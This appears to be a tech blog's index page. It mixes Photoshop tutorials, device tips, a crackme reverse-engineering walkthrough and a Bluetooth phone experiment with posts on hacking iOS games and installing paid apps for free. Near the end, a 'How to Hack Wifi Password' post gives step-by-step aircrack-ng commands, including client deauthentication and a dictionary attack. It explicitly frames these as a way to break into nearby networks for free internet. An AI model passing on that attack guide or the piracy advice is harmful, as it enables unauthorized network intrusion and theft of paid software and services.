[Tutorial] Create a Gingerbread Cookie in Photoshop

Gingerbread final previewIn this Photoshop Tutorial we’ll create a yummy Gingerbread Cookie in Photoshop using custom patterns, textures and layer styles
I was preparing some gingerbread cookies, they looked so nice that I created one in Photoshop and the result is quit yummy. Let’s jump into the baking process.

Learn more »

0 comments:

[Tutorial] Remove a person or object from image

Final Preview Clone There are times in a web designer or graphic designer's colorful and creative life that they will encounter a situation where in a certain object from an image they are designing on needs to be remove for design productivity and graphic enhancement. This Photoshop Tutorial will show you how to achieved that objective with the help of the clone stamp tool in Photoshop.

Learn more »

0 comments:

6 Ways to use Public Wifi Hotspots Safely

Places like Starbucks, neighborhood cafes, Barnes&Noble, and universities are all jumping on the "free Wi-Fi" bandwagon--hey, it's trendy. As a result, more of us are connecting to these networks without realizing the security risks.

Learn more »

0 comments:

Tips and Tricks for Speeding up your Android Device

Android smartphones and tablets can become slow and sluggish over time. These easy-to-follow tips will help make your device run like new.






Learn more »

0 comments:

[Hack] Max Steel v1.0 No Jailbreak

Hack Max Steel v1.0 without jailbreak no jailbreak is required, :) Now you can show off your jailbreak friends that you have completed the whole game without jailbreak and without hack!






Learn more »

0 comments:

[Tutorial] Dark Storm Scene Photo Manipulation

In this Photoshop Tutorial l will show you how to create a dark storm scene. We will come through steps with combining different stock images, using brushes, adjusting colors, making light and shadow in a proper way.






Learn more »

0 comments:

Real Racing 3 Hack For No Jailbreak No Cydia for iPhone/iPad/iPod

This is more for those who are not jailbroken (if there are still people left with stock idevices ) as IAPFree works well in this game.




Learn more »

15 comments:

Need for speed MostWanted No Jailbreak Hack For iPhone/iPod/iPad

Hack Need For Speed Most Wanted No Jailbreak Required it can be hacked without jailbreak, easy hack without any tweaks of cydia nor any problems fully checked and working 100%.




Learn more »

0 comments:

Hack Gangstar Vegas Any Version for iPhone/iPad/iPod no jailbreak no cydia

gangstar vegas
Hack Gangstar Vegas Easily no jailbreak load original hacked tweaked game save file and enjoy fully hacked game






Learn more »

6 comments:

Joe The Zombie All Versions Hack For iPhone/iPad/iPod No Jailbreak

Joe the Zombie
Hack Joe Zombie All Versions no Jailbreak required nor any cydia tweaks is required to hack joe zombie you can hack the game without jailbreaking the iPhone/iPad/iPod.






Learn more »

0 comments:

[Tutorial] Nocturn Fantasy Photo Manipulation in Photoshop

Final Preview for NocturnIn this Photoshop Tutorial we are going to learn how to create our own portrait of a fantasy dreamy nighty panorama. We will learn unique technique on how to set mood dealing with sharpening images, lightning and selection.








Learn more »

0 comments:

Zombie Farm 2 v2.23 Hack For iPhone/iPad/iPod

zombie farm 2
Hack Zombie Farm 2 v2.23 no jailbreak is required you can hack this game without a jailbreak even if you have a jailbreak you can still hack this game without a fuss.






Learn more »

8 comments:

How to Create a Bootable UEFI USB Flash Drive for Installing Windows 7, Windows 8, or Windows 8.1

The Tutorial will show you how to create a Windows 7 or Windows 8 or 8.1 installation bootable USB flash drive for UEFI from either a Windows 7 or Windows 8/8.1 installation ISO or DVD.

Requirements:
  • At least 4gb USB flash drive
  • 64-bit Windows 7 ISO or DVD (if you want to install Windows 7)
  • 64-bit Windows 8 ISO or DVD (if you want to install Windows 8)
  • 64-bit Windows 8.1 Preview ISO or DVD (if you want to install Windows 8.1 Preview)
  • 32-bit is not supported
Learn more »

0 comments:

Hack Brother in Arms 2 Global Front v1.0.8 for iPhone/iPad/iPod

Hack Brother in Arms 2 Global Front v1.0.8 No Jailbreak Required, it can be hacked without jailbreak, unlock all weapons and get unlimited coins and medals which you can use.






Learn more »

0 comments:

[Tutorial] Creating Light Effects to a Photo

Final PreviewIn this Photoshop Tutorial we will learn how to give enchantment to an ordinary photo by adding some colorful light effects








Learn more »

0 comments:

Hack Sheep Happens v1.3 on iPhone/iPad/iPod No Jailbreak

Sheep Happens
Hack Sheep Happens v1.3 no jailbreak required it can be hacked without jailbreak get unlimited coins as many as you want.






Learn more »

0 comments:

5 tips to make your Facebook account safer

Help better safeguard your Facebook profile with these 5 quick tips.

Learn more »

0 comments:

Hack Bump Sheep No Jailbreak Cydia

Bump Sheep imageHack Bump Sheep Easily you do not require a jailbreak it can be hacked easily without the jailbreak all mode and cards will be unlocked.





Learn more »

0 comments:

Don’t Remember Sending That Text? You Might Have Been Asleep

An Increasing Number Of Smartphone Owners Are Texting In Their Sleep

Smartphones have become a major part of many people’s everyday lives. More and more smartphone owners use their devices to text, email, and surf the web throughout the day.
Learn more »

0 comments:

How To Hack Slugterra : Slug it Out v1.3.0 No Jailbreak

Slugterra Game Play
You can hack easily, you would not require any kind of jailbreak, you will be able to hack it without it, just be sure not to sync with your iCloud Account.





Learn more »

0 comments:

Tutorial - Flying Girl Photo Manipulation

Make this wonderful image of a flying girl by mixing all the images and painting the girl itself within the photoshop







Learn more »

0 comments:

[HACK] Suspect in Sight Anniversary Edition ( All Versions )

You do not require any jailbreak it can be done easily without it, all you require is just iFunbox for hacking, you do not require any skills just the plist file you will have to follow instructions provided here to hack.




Learn more »

0 comments:

Top 10 Computer Security Tips

The Security tips which should be known by each and everyone while doing any kind of stuff on the internet, it would help you to be safe online and regarding all tips which a computer novice to professional should know.

Learn more »

0 comments:

How to Create a Breathtakingly Artistic Winter Horse Illustration in Photoshop

Learn how to create this amazing photo manipulation with a variety of blending techniques, custom brushes, and more. This intermediate-advanced tutorial also comes with its own set of raw ink splatter scans so that you can practice creating your own Photoshop brushes. And of course, the full layered PSD is included as well.

Learn more »

2 comments:

How to Hack Candy Crush No Jailbreak

This hack works on old version of candycrush it will not work on new version , with the hack you can get unlimited lolipods and unlimited hearts with reaching level 335 and all  stage with 3 stars, you do not require any special tools except the iFunbox



Learn more »

0 comments:

Free Purchase Hack Of ProTuber No Jailbreak

Hack Pro Tuber App, easily with this step by step tutorial, you would not need jailbreak but if it is jailbreak it would work fine so do not worry. You will be able to purchase the full package without any problems and would be able to download UNLIMITED videos in HD, without paying a single Penny.








Learn more »

1 comments:

Abstract Art Design

Final Result for Abstract DesignDesigning abstract compositions with various colours, lines, and different forms are really amazing to work with. These form of arts exists in as early as the 19th Centrury and is still widely adopted around the world. It may evolved from early abstract art to modern abstract design art but the ways of describing visual experience to the artist still brings beauty and joy to the people who appreciate it.



Learn more »

0 comments:

Hack Plants Vs Zombies 2 in iPhone/iPad/iPod

Hack plants vs zombies 2 without using iFile and other such application now you can hack plants vs zombies 2 with the help of your iDevice and iFunbox That is it and you will be able to hack into the plant vs zombies 2 and get large amount of coins/stars/keys, you can use them till you get tired of using and delete it.

Learn more »

0 comments:

Erase All Content and Settings While Jailbroken

Ever wanted to keep the jailbreak while erasing all the content and settings, well now it is possible by this step by step tutorial it will give you fresh start on your jailbroken device without using iTunes or actually restoring or updating your device.
Learn more »

0 comments:

Beating an SEH/VEH based Crack me through analysis

       In this article , I will try to show how to beat an advanced crackme that is using an interesting way to calculate the length and it’s generating exceptions to be dealt with in order to return values into 32-bit registers such as EAX register , the key to beat a crackme is deep analysis through what it does under the hood especially when it’s using mixed methods to confuse,stop or slow the reverser.

Click Images To Enlarge Them.

This Crackme was taken from a very popular challenge website that I will not mention , I edited the strings printed in the interface in memory not to spot the website . I was also the 59th person to validate it (Validation rate 3%).

Let’s start by opening the CrackMe and see what it’s waited from us to do !!




It asks us politely to type a pass or to Crack it I guess.

Open your mind and carry on . Now we need to take a quick look on what routines are exactly dealing with the user input . Let’s switch to Immunity and take a quick look.


 You can see that it is taking a user input then calling an address specified by EBX register after that it’s deciding whether printing the success or fail message. We are now interested in what’s directly going after getting the user input using scanf so let’s see what EBX holds and step into that call.

EBX isn't taking us farther but just below this code a little bit. The instructions which EBX will take us to are the ones responsible for checking the user input and deciding whether it’s right or not. The responsible routine is a little bit long and it’s split into 4 main parts each part ends with a JE (Jump If Equal) instruction. So let’s take care of each part alone :

1st Part – Checking the length :
<<< Instructions




We can see that DEADBABE will be added to 227A65DD which will make ESI holding the memory address that specifies the user-input, then the next instruction will try to set the CarryFlag which is already set , the next instruction that may attract your attention is at address 00CC109D this is the address that will actually calculate the input string length . How did I know it ? I will explain.

You can see that the value 400 is moved to ECX , you can also remark that 227A69D9 is moved to EDI then EBX is added to it , the result will be stored at EDI for sure. Before the ADD instruction we have a VERY important instruction which is SALC , this instruction will Set the AL value to FF if the CF is set or to 00 if the CF is cleared . In our case CF is set , so the value of AL will be FF , this value is very important because the SCASB instruction will try to find all bytes that aren’t matching AL starting at ES:[(E)DI] . In addition, here we have the REPE instruction that is accompaigned with the SCASB instruction so it will try to use the ECX register to specify a search « array » , you can clearly see that ECX register was set to 400.

Now , go and check what EDI is holding after the ADD instruction you will see that it’s holding the value 00CC2497 . Follow this value in dump and you will find yourself in front of a bunch of «FF » , you see now that ECX holds the value 400 , this means that the search array will go to zero in other words and in theory the search will end when ECX will hold the value 00000000 , which make us figure out that the instruction will search for the first value that is different from « FF » from 00CC2497 until ( 00CC2497 – 400 ) = 00CC2097 and if no different values from FF were found ECX will just hold 00000000 . When following 00CC2097 in dump you will find what follows :
Here, the REPE SCASB instruction will stop in the last highlighted NULL byte in blue « 00 » because it is different from « FF » here ECX will hold the length from 00012097 until the value before the null byte. In my case here (input 123456) ECX will hold the value 9 because we should begin the counting from 0 then 1 then 2 until reaching 9 means reaching 000120A0.

Now that we know how the length is calculated we should figure out what length this crackme needs. In this phase we don’t care about if the serial is right or not because we just want to get through the first condition in a right way. You can see in the last two lines that we will subtract 0F from ECX then Jump if ZF=1 or not jump if ZF=0 , in other words if the ECX = 00000000 after the
subtraction the ZF will be set if not it will still equal 0. So basically after the REPE SCASB instruction ECX should hold 0F which equals 15 in decimal . So we just need to insert a string with 12 character length and he jump will be taken

2nd Part – First 4 bytes of the flag :

As the conditional jump was taken you will fall directly into the second instruction which is LODS DWORD PTR DS:[ESI], this instruction will basically load the DWORD DS:[ESI] value into EAX register this value should be the first 4 characters that we wrote in our flag in decimal and also converted to little endian so if the first 4 characters that you entered were 1234 then EAX should hold after this instruction 34333231. After that we see that a DWORD is moved to EDX then EAX is Xored with it , this is almost the same case that I coded in CrackMe#3 at Hackathon Challenge . The right value of EAX after xoring it with EDX should be 1608030E so the first DWORD of our flag is 1608030E Xored with EDX . Which will give you that value : XOR 1608030E, 5A643059 = 4C6C3357 you will just have to convert it to big endian and you will have the first 4-bytes of the flag : 57336C4C which is « W3lL » in ASCII.

Now just type W3lL and type 8 random characters after it and you will see that ZF
will be set after the compare and the jump will be taken.

3rd part – Second 4-bytes of the flag (SEH) :
The 2 first parts were fun , now more . Let’s see the instructions :



Like the last part, we will fall directly into the second instruction which will move a DWORD from memory to EBX register , after that a substruction of 1000 will be done to EBX which will carry now 00CC1530 . This adress is the new adresse of the exception handler which will be set in a while , EBX will be pushed then the new exception handler will be completely created when moving ESP into DWORD PTR FS:[0] . After that the second 4 bytes of the user-input will be placed into EAX
register in little endian format , then a value that will xor EAX is moved into EBX.

Here where the TRAP is : the « INT 1 » instruction.

 We can see here that when we will step over this instruction using « F8 » the EIP will just hold directly the adresse 00CC10DF , so we don’t have to step over this instructions but let run normally the crackme as it was executed outside a debugger
. Basically the INT 01 instruction is called single-step break it will run after each instruction if the TrapFlag is set . Nevertheless, here it’s invoked directly inside the code and the TF is cleared which will generate an exception and never set the TF. Let me explain to you what is exactly happening when the « INT 1 » is passed through in normal execution and not by single stepping through it , keep in mind that this INT instruction will generate an exception that will be handeled by the SEH
newly created . Basically when we will trigger this interrupt the processor will go into the 1st location in the Interrupt Vector Table which starts in memory location 0x00 and ends at 0x3FF simply because interrupts can take a number which is between 0 and 255. After that the IP will be saved and also the CS , this basically will store 4 bytes (IP = 2 bytes & CS = 2 bytes) , before the interrupt will hand back the flow of execution to the program normally it will return using an « iret »
instruction . Here the IMPORTANT PART that the CS:IP and all FLAGS are restored again.

So basically when the instruction PUSH EBX at 00CC10C6 is executed it will indicate the current SE Handler which means the instructions that will deal with an exception , the exception here is triggered by the « INT 1 » instruction and the execution flow is moved directly into 00CC1530 , after returning the exception will be handeled and the execution flow will continue normally . The only thing you need to do is just set a breakpoint on the instruction after the « INT 1 » instruction
because the EIP will be incremented by 2 and it will skip that instruction. After we will return from the Exception handling routines we will see that EAX will hold a return value that is ADDed to the previous value that was held by EAX.

Now let’s work on finding that god damn second part of the validation flag. Pretend that I didn't say that the return value stored in EAX isn't added to its previous value so here you can just see after stepping over the « INT 1 » that the value of EAX will change. So we need to figure out if the EAX holds an address that have been moved , added or subtracted to it. In order to do it let’s rerun our Crackme inside a debugger for sure . Now we will enter this input for example : W3lL11119876 the
DWORD that will be treated in this part is 31313131 (111 in ASCII) so let’s step over the LODSD instruction and you will see that EAX is filled now with 31313131. As I said previously , you have to set a bp at 00CC10DD then step over it using <shift + F8> BUT we don’t want to do that now because this will make the value of EAX change and we will need to figure out what arithmetic operation is done when the value that is returned by interrupt will be Moved , added , subtracted ,
multiplied by the current value of EAX. So here what I've done is that I went and edited the value of EAX just before executing the interrupt to NULL , EAX =00000000 So I will not need to brute force each arithmetic operation if it’s an ADD so EAX will hold a value if it’s a multiplication EAX will still hold 0 , division either 0 or an exception ... etc

So , after executing the Interrupt I realized that EAX holds the value 21486553 , let’s covert this to big endian and to ASCII cause it’s printable =) ... we will finally have 53654821 = SeH!

If you want to be more sure if the operation is an addition just go and change EAX to 00000001 and you will get 21486554 which is in big endian + ASCII : TeH! .

Ok so now after we knew what is the value returned by the interrupt we must know what is the right value that EAX should hold before the XOR instruction. That’s simple , we see that EAX is compared to 18D386D7 after being Xored and it’s Xored with 495F4265 , so just before the XOR and just after « INT 1 » EAX should hold : 518CC4B2 (Xoring 18D386D7 with 495F4265) . Okey now we found what value EAX should hold just after the « INT 1 » instruction and we know that after the interrupt 21486553 is added to EAX register . Sooo the right value of EAX after the LODSD instruction is 518CC4B2 – 21486553 = 30445F5F int big endian 5F5F4430 and in ASCII : __D0 . So now the 8 first characters of the flag are W3lL__D0 . Let’s try to rerun the crackme and enter this serial : W3lL__D09876 . By stepping throught instructions until the Jump if equal in this part (don’t forget the bp) , you will see that the ZF will be set and the jump will be taken simply because the comparison went true and those 4 bytes are the correct ones.

4th part – The last 4 bytes of the flag (VEH) :
Here are the instructions :


We can see from a general view that these instructions are building a Vectored Exception Handler (VEH) which will deal with an exception executing a routine present at the instruction pointed by EBX , pushing a second Nonzero argument indicates that the VEH is inserted into the very head of the list then it’s Removed after executing a bunch of instructions that will check how is the last DWORD of the user-input is correct , those instructions are containing an exception at adresse
00CC110A.

But first what is a Vectored Exception Handler . According to MSDN :
– Vectored Exception Handling is new as of Windows XP.
– All information about VEH are stored in the Heap.
– Vectored exception handlers are explicitly added by your code, rather than as a
byproduct of try/catch statements.
– Handlers aren't tied to a specific function nor are they tied to a stack frame.

So basically to be sure that an excpetion is trigerred and dealed with we have to put a breakpoint on the first instruction that is executed by the VEH which will be the EBX register pushed adresse for sure. While running the code we will see that the last DWORD is loaded in little endian format again into EAX register then a value is moved to EBX which is the value that we will use for Xoring. But just after this we have a MOV instruction which will move EBX to the current DWORD in the
memory location pointed by EBP , while stopping in that instruction you will see that EBP is holding the value 00000001 so an exception should be triggered as it’s impossible to move EBX to that location . If you put a bp on the pushed EBX in the stack you will see that the execution flow will be taken by the instructions at 00CC1960 (pushed EBX as an arg to create the VEH) . Those routines will handle this exception and return also a value to EAX register which will be added as
happened in the previous part of checking the flag.

So we will need to figure out what is that added value again , all we need to do is to change the value of EAX register after the LODSD instruction to 00000000 then put a breakpoint on 00CC110D and press « F9 » so we don’t skip that instruction as happened last time. Now all we have to do is look at what EAX is holding : it’s holding D9150F32 . So after the handling the exception this value (D9150F32) will be added to EAX register , now we need to figure out what should be the right value of EAX just after handling the exception means : (D9150F32+ LastFlagDwordLittleEndian)

You will just have to XOR 8E7632F3 with EBX , and you will have this value : FA3654A0 . So the right last DWORD of the flag in little endian should be :

FA3654A0 – D9150F32 =2121456E –> Big Endian = 6E452121 –> ASCII =nE!!

So the last 4 characters of the flag are : nE!! ...

5 – Regrouping the 3 parts :

So the complete flag to validate the challenge is : W3lL__D0nE!!  Now just try to provide the flag to the Crackme and you will see that :

Finally , this was a really GOOD crackme that I actually enjoyed discovering and cracking because it uses many handlers to deal with exceptions then return some values that will be added and also uses a very interesting method to check for the length .

0 comments:

Create Bokeh Heart Effect

Create a wonderful bokeh effect with a heart shape and some nice blue effect in background for illustration. This design can also be use for other composition enhancement to bring more attraction and focus on the subject image.







Learn more »

0 comments:

Add a tattoo to an image and bring it to life

Sometimes inspiration don't come when you need it, so looking around for it I found this image. I thought it was a nice image and a good subject for a new tutorial.
This tutorial won't take you more than 30 minutes to go through it and it will show you how to use Clone Tool, Brush Tool, Pen Tool and how to apply lighting effects.



Learn more »

0 comments:

Fix app crash in your iPhone/iPad/iPod downloaded through Kuaiyong

So you have installed application through kuaiyong, and you are facing problems to play the application to be able to use it? Well you can now fix this problem which is constantly opening and closing your app in your iPhone/iPad/iPod.

Learn more »

24 comments:

How to install apps on iPhone/iPad/iPod Free No Jailbreak

So you want to install all the costly apps around, and you do not want to pay for it? Well you can get them without any problems and show off your friends that i prefer purchasing application rather then jail breaking my iDevice, you can do that now just follow this tutorial and you will have apps like you purchased them but a warning though do not, never buy in app purchase when you install application through this.


Learn more »

10 comments:

How to Record or Answer Phone Calls On iPhone?

Have you missed calls on your iPhone while you're busy working on your laptop or PC?
If so, a new Mac app called Dialogue comes to the rescue.
Dialogue alerts you when you get a call on your iPhone. It would allow you to answer and you would be able yo make calls right from your Mac, and if you think that is not enough, it would also let you record conservation, something which is not possible using your iPhone currently (Note:  It may not be legal to record conversation in some countries.)

Learn more »

0 comments:

Creat a Text Effect With Blood In Photoshop

Create a realistic Blood Text Effect using the layer styles in photoshop, by using some free sources which are available for free on the internet.
Simple Step by Step Tutorial To Make A Scary Blood Text Effect In Photoshop




Learn more »

0 comments:

How To Hack Mobile Phone

    A mobile phone is a cool gadget to play with, especially when I can run my favourite programming language (no prize for guessing what it is!) on it! That was the logic which made me purchase a Nokia Series 60 smartphone, the N-Gage QD. This article describes a few experiments I did with the mobile - like setting up Bluetooth communication links, writing Python/C code and emulating serial ports.


Bluetooth on Linux

Bluetooth is a short distance wireless communication standard. It is commonly used to facilitate data transfer between PC's and cell phones/PDA's without the hassle of `wired' connections. The hardware which provides Bluetooth connectivity on the PC is a small device called a `USB-Bluetooth dongle' which you can plug onto a spare USB port of your machine. I approached the local electronics dealer asking him for such a device and got one which didn't even have the manufacturer's name printed on it. The driver CD which came with it of course contained only Windows software. Deciding to try my luck, I plugged the device on and booted my system running Fedora Core 3 - bluetooth service was started manually by executing:

sh /etc/init.d/bluetooth start


Here is the output I obtained when the command `hciconfig' ( which is similar to the `ifconfig' command used to configure TCP/IP network interfaces) was executed:

hci0: Type: USB
BD Address: 00:11:B1:07:A2:B5 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING PSCAN ISCAN
RX bytes:378 acl:0 sco:0 events:16 errors:0
TX bytes:309 acl:0 sco:0 commands:16 errors:0


My no-name USB-Bluetooth dongle has been detected and configured properly! The number 00:11:B1:07:A2:B5 is the Bluetooth address of the device.
Detecting the mobile

The next step is to check whether Linux is able to sense the proximity of the mobile. If your phone has bluetooth disabled, enable it and run the following command (on the Linux machine):

hcitool scan


Here is the output obtained on my machine:

Scanning ...
00:0E:6D:9A:57:48 Dijkstra


The `BlueZ' protocol stack running on my GNU/Linux box has `discovered' the Nokia N-Gage sitting nearby and printed its Bluetooth address as well the name which was assigned to it, `Dijkstra'.
Pairing the mobile

For security reasons, some interactions with the mobile require that the device is `paired' with the one it is interacting with. First, store a number (4 or more digits) in the file /etc/bluetooth/pin (say 12345). Stop and restart the bluetooth service by doing:

sh /etc/init.d/bluetooth stop
sh /etc/init.d/bluetooth start


Now initiate a `pairing' action on the mobile (the phone manual will tell you how this is done). The software on the phone will detect the presence of the Bluetooth-enabled Linux machine and ask for a code - you should enter the very same number which you have stored in /etc/bluetooth/pin on the PC - the pairing process will succeed.
Transferring files

Files can be transferred to/from the Linux machine using a high level protocol called OBEX (standing for OBjectEXchange, originally designed for Infrared links). First, you have to find out whether the mobile supports OBEX based message transfer. Try running the following command on the Linux machine (the number is the bluetooth address of the phone):

sdptool browse 00:0E:6D:9A:57:48


You might get voluminous output - here is part of what I got:

Service Description: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 9
"OBEX" (0x0008)


OBEX is built on top a lower-level protocol called RFCOMM. The `Object Push' service uses RFCOMM `channel' 9. Let's try to upload a file to the phone; run the following command on the Linux machine:

obex_push 9 00:0e:6d:9a:57:48 a.txt


The phone will respond by asking you whether to accept the message coming over the bluetooth link. The same command, invoked without any option, can be used to receive files sent from the mobile over the bluetooth link (read the corresponding `man' page for more details).
Installing Python

Nokia has recently done a port of Python to the `Series 60' smartphones running the Symbian operating system. The Python interpreter as well as a few important modules are packaged into a single .sis file (somewhat like the Linux RPM file) which can be obtained from http://www.forum.nokia.com/main/0,,034-821,00.html. The file to be installed is named PythonForSeries60_pre_SDK20.SIS. The first step is to transfer this file to the mobile via obex_push. Trying to open the file on the mobile will result in the Nokia installer program running - it will ask you whether to install Python on the limited amount of memory which the phone has or to an additional MMC card (if one is present). Once the installation is over, you will see a not-so-cute Python logo on the main menu of the phone - Figure 1 is a screenshot I took of the main menu.

Mobile Hacking


Mobile Hack 2
Running the Python `Hello, World'

You can write Python scripts on the Linux machine and upload them to the mobile with `obex_push'. If you try to open these scripts (on the mobile), the `applications manager' will ask you whether to install the files as Python scripts or not. Once installed as scripts, you can execute them by following the instructions displayed on the screen when you open the `Python' application from the main menu.


The output obtained by installing and running the following script on the mobile:

import appuifw # The application UI framework
appuifw.app.title = u'Cool Python'
appuifw.note(u'OK', 'info')


Socket programming

Application programs running on both the phone as well as the Linux machine interface with the Bluetooth protocol stack via the socket API. Listing 1 shows a simple client program running on the mobile which connects with a server running on the Linux machine and sends it a message; the server code is shown in Listing 2.

The Python client program running on the mobile opens a Bluetooth socket and connects to the PC whose device address is specified in the variable `ATHLON'. Once the connection is established, it simply sends a string `Hello, world'.

The server program running on the PC opens a Bluetooth stream socket, binds it to RFCOMM channel 4 and calls `accept' - the server is now blocked waiting for a connection request to arrive from the client. Once the request arrives, the server comes out of the accept, returning a `connected' socket calling `recv' on which will result in the server getting the string which the client had transmitted.

The `bacpy' function in the server program is defined as an inline function in one of the header files being included - so you need not link in any extra library to get the executable. But if you are using any of the other Bluetooth utility functions like `ba2str', you have to link /usr/lib/libbluetooth.so to your code.
Using PyBlueZ

There is an interesting Python interface to the Bluetooth library in Linux called `PyBlueZ' available for download from http://org.csail.mit.edu/pybluez. It simplifies the process of writing bluetooth socket programs on the Linux machine. Listing 3 shows the Python implementation of the server program described in the previous section.
Emulating serial links

Programs like `minicom' are used to talk to devices connected over a serial link (say a modem). There is a neat software trick to present a `serial-port-like' view of a bluetooth link so that programs like `minicom' can manipulate the connection effortlessly. Let's try it out.

First, edit /etc/bluetooth/rfcomm.conf so that it looks like the following:

rfcomm0 {
bind no;
device 00:0e:6d:9a:57:48;
channel 1;
comment "Example Bluetooth device";
}


After stopping and restarting the bluetooth service, run the following command:

rfcomm bind /dev/rfcomm0


You should see a file called `rfcomm0' under /dev after executing the above command. Now, you can set up `minicom' by running:

minicom -m -s


The only thing to do is to set the name of the device to connect to as /dev/rfcomm0. Save the new configuration as the default configuration and invoke:

minicom -m


Minicom is now ready to talk to your phone! Type in `AT' and the program will respond with an `OK'. Say you wish to make your phone dial a number. Just type:

atdt 1234567;


There are many other AT commands you can experiment with; try googling for say `mobile phone AT commands' or something of that sort!

After you have finished with your virtual serial port manipulations, you should run:

rfcomm release /dev/rfcomm0


to `release' the serial-bluetooth link.
Python over a Bluetooth console

Once you get the serial port emulation working, there is another interesting hack to explore. The Nokia Python distribution comes with a program called `btconsole.py'. On one console of your Linux machine, run the command:

rfcomm listen /dev/rfcomm0


Now run `btconsole.py' on the phone. You will see that after a few seconds, `rfcomm' will respond with a `connected' message. Once you get this message, take another console and run:

minicom -m


What do you see on the screen? A Python interactive interpreter prompt! You can now type in Python code snippets and execute them on the phone on-the-fly! Isn't that cool?
Parting Thought

I was curious to know how Microsoft's Windows XP operating system, famous for its `ease of use', would compare with Linux when it comes to interacting with my NGage QD. I installed the Windows driver for my no-name usb-bluetooth dongle and tried to get the Nokia PC suite up and running on an XP machine - maybe it's because I am far more experienced in GNU/Linux than on MS operating systems, but I found the XP experience far less `friendly' than MS would care to admit. I believe that most of the `user friendliness' of the Microsoft operating system comes from hardware vendors and application developers tightly integrating their products with the platform rather than any inherent quality of the OS as such.
References

For a general introduction to Bluetooth technology, see http://www.dell.com/downloads/global/vectors/2003_bluetooth.pdf. An interesting paper on Bluetooth security is available at http://www.niksula.cs.hut.fi/~jiitv/bluesec.html.

http://www.holtmann.org/ has plenty of information regarding Bluetooth and Linux; I found the document `Bluetooth Programming for Linux' (http://www.holtmann.org/papers/bluetooth/wtc2003_slides.pdf) very informative.

Lots of information about Python on series 60 mobiles is available at http://www.postneo.com/postwiki/moin.cgi/PythonForSeries60/. ObexFTP seems to be an interesting tool - you can get it from http://triq.net/obex/. There are some documents floating on the net which describe how you can do an NFS mount of your phone's file system - try a google.


Warning: This is Only For Educational Purposes, I Am Not Responsible Of What You Do With It.

0 comments:

Create a Cute Little Deer in Photoshop

In this Photoshop Tutorial we are going to make a Cutie Little Deer. We will be using some basic tools such as pen, dodge, and burn tools in the process of making this tutorial. Hopefully you will like it!





Learn more »

0 comments:

How to Create a Mountainous Matte Painting in Photoshop

Matte Painting

How to Create a Mountainous Matte Painting in Photoshop

Learn how to create this landscape matte painting with Photoshop! This tutorial will show you how create our own mountain scene by arranging multiple stocks together and blending them correctly using layer masks and adjustment layers. You will also learn effective techniques for adding waterfalls and mist.
Learn more »

0 comments:

Update Apps Installed through Kuaiyong


 So you have installed apps from Kuaiyong, but you are annoyed with the amount of updates it keeps on showing and increasing day by day, and you cant update your app, well you can update it easily by following this step by step tutorial through which you will get to know about how you would be able to update your application without actually purchasing the app, Kuaiyong is a app through which you can install applications for free without any problems you do not require a jailbreak or anything all you need is iDevice and Kuaiyong and you can install apps on your iDevice FREE



Learn more »

8 comments:

Create a Christmas Artwork in Photoshop

In this Photo-Manipulation tutorial, we will learn how to create a huge Christmas tree sitting alone in the winter field. This tutorial will show you how to create this beautiful image using images and textures and apply special lighting effects to make the Christmas tree glow







Learn more »

2 comments:

How to Hack Wifi Password - EASY

This is one of the fresh tutorial on wifi Hacking, many of us know there are many such wireless network present around us. So i decided why not hack those network so we can get some free internet access.





So lets begin for this you need Backtrack OS and Network Adapter (Of course it is always integrated with your laptop)
Lets do this :)

  • Setting up your network device on your laptop
To capture network traffic without being associated with an access point, we need to set the wireless network card in monitor mode.
To do that, type
Command # iwconfig (to find all wireless network interfaces and their status.)

Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)

  • Reconnaissance
This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:
Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range.)
  • Capturing Packets
To capture data into a file, we need to use the airodump-ng tool again, along with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packs on channel 1 into a text file called data:
Command # airodump-ng -c 1 bssid AP_MAC -w data mon0
  •  De-Authentication Technique
To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_CLIENT is the MAC address of an associated client.)

  • Cracking WPA/WAP2
Once you have captured a four-way handshake, you also need a large/relevant dictionary file (commonly known as wordlists) with common pass phrases

Command # aircrack-ng -w wordlist 'capture_file'.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake)

Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak pass phrases and good dictionary files.

Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable pass phrase can be broken within a few minutes using an offline dictionary attack.

This One Is Real Tested one and working perfectly so all the best hackers.

This post is only for educational purpose i am not responsible for the things, you do...

4 comments:

How to Downgrade Windows 8 Preinstalled to Windows 7

This tutorial will show you how to downgrade your Windows 8 Preinstalled with or without Secure Boot to Windows 7.
Learn more »

0 comments:

Create a Mobile Calendar App in Photoshop

This is what you will be making
Tutorial Details 
Program : Adobe Photoshop CS5
Difficulty: Intermediate
Estimated Completion Time: 2- 3 Hours

In this tutorial we will show you how to design a Mobile Calendar App in Photoshop

Learn more »

0 comments:

How To Confirm Secure Boot Enabled or Disabled in Windows 8

The Tutorial will show you how to confirm if Secure Boot is enabled or disabled in your UEFI settings from inside Windows 8.
You must be signed in as an administrator to be able to do the steps in this tutorial.

Learn more »

0 comments:

How to Open an Elevated Windows PowerShell in Windows 8

Windows PowerShell is a task-based command-line shell and scripting language designed especially for system administration.

For more information and usage about Windows PowerShell, see: Windows PowerShell

The tutorial will show you how to open an elevated "Windows PowerShell" that will run as administrator with full administrator rights in Windows 8.

Learn more »

0 comments:

Use The Offline Gmail

Gmail as we all know that it is a short form for Google Mail, it is one of the products of Google INC. In the race of email clients Gmail is rushing its way to the top with more and more abilities and thus attracting more users from other mail accounts which you can say yahoo and outlook (formerly known as hotmail). They have introduced much extra features through lab features which are right now in testing stage but users can still use them. You can view and enable them from the tab which appears in right most corner of the gmail.

Learn more »

0 comments:

